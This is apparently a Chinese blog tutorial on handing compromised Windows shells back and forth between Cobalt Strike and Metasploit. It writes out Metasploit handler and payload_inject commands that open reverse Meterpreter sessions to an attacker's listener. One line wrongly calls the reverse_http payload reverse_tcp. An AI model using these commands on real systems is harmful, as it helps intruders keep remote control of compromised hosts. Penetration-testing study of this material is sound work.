msf与cs互传shell

本文详细介绍了如何在Cobalt Strike(CS)和Metasploit Framework(MSF)之间传递shell,包括CS将shell传给MSF以及MSF将shell回传给CS的过程。通过设置监听器和利用特定模块,实现了两个工具间shell的独立运作,增强了渗透测试的灵活性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

cs传shell给msf

msf传shell给cs


因为cobaltstrike和MSF各有优势,所有有时候需要互传shell。

  • cs: 192.168.110.130
  • msf:192.168.110.130
  • 靶机:192.168.110.157

cs传shell给msf

假设cs此时获取了一个shell,然后需要将此shell传给msf

1. 在msf中创建反向监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.110.130     #如果为云服务,则填写公网ip地址
set lport 4444

2. cs创建监听器,名字为msf

选择Foreign http

3. cs执行监听器  spawn msf

此时msf收到了shell

可见是从靶机直接将shell传给msf的,此时的shell不依赖cs。cs退出此shell也不会断。

msf传shell给cs

1. cs创建监听器

选择的是http方式连接

2. msf派生shell

先把会话放到后台,设置如下。因为cs上设置的为http连接,所以我们下边payload也要对应的设置为reverse_tcp

#派生一个新的shell给cs,那么msf里面用到的exploit是
use exploit/windows/local/payload_inject 
set payload windows/meterpreter/reverse_http
#禁止产生一个新的handler
set disablepayloadhandler true
#设置ip端口为cs监听的
set LHOST IP
set LPORT 端口
set session 3
run

执行run

执行之后即可得到一个cs的会话

 同样,此shell也不依赖于原来msf的shell。msf shell关闭此shell依然可用

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Ly4j

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值